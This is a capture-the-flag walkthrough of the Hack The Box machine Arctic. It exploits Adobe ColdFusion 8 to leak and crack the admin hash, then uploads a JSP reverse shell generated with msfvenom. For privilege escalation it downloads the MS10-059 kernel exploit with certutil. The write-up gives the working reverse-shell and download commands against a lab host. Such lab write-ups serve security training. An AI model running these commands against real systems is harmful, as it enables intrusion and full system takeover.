Hack The Box - Arctic

We are going to pwn Arctic from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/9

Lets Begin with our Initial Nmap Scan.

Nmap Scan Results:

PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Nmap scan doesn’t show whats in port 8500 so I started checking that, Which reveals a directory.

/cfdocs/
Some docs files, nothing useful.

/CFIDE/

Found an administrator over there and it leads to an login page. Which is ColdFusion8 by Adobe.

Since we know the version we can start looking for exploits and I found this.

https://www.exploit-db.com/exploits/14641

I tried that payload in the url and it gave me a hash, It will be the admin’s hash.

I used CrackStation to do this.

Logged in as admin happyday

Now its time to get reverse shell, Under Debugging & Logging Category I found Scheduled Tasks.

It gives us an ability to download an file and store it in the box - Publish but we need to give the directory.

Since ColdFusion running as Java we need to create a reverse shell using jsp.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=1234 -f raw > shell.jsp

We need to upload it so, I started Python HTTP server.

Now where to store the script? I found the location of ColdFusion in Server Settings > Mappings

Now its time to upload the shell!!

Once uploaded I visited http://10.10.10.11:8500/CFIDE/ is where the reverse shell is stored.

Started my listener and opened shell.jsp

Got User Shell and Flag!

Privilege Escalation:

Like always when I get a shell I start with systeminfo

Where Hotfix(s): N/A which means the system is not updated so far.

A hotfix or quick-fix engineering update is a single, cumulative package that includes information that is used to address a problem in a software product.

So we can try with Windows-Exploit-Suggester

I Copied the systeminfo output to my machine as systeminfo.txt and start WIndows_Exploit_Suggester. Since there is a lot of vulnerability, I started with MS10-059.Searched for exploits and found this Windows_kernel_exploit This is the one we need.

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri

Uploaded the executable to the box

certutil.exe -urlcache -split -f http://10.10.14.31:8000/Chimichurri.exe Chimichurri.exe

Started my Listener and got AUTHORITY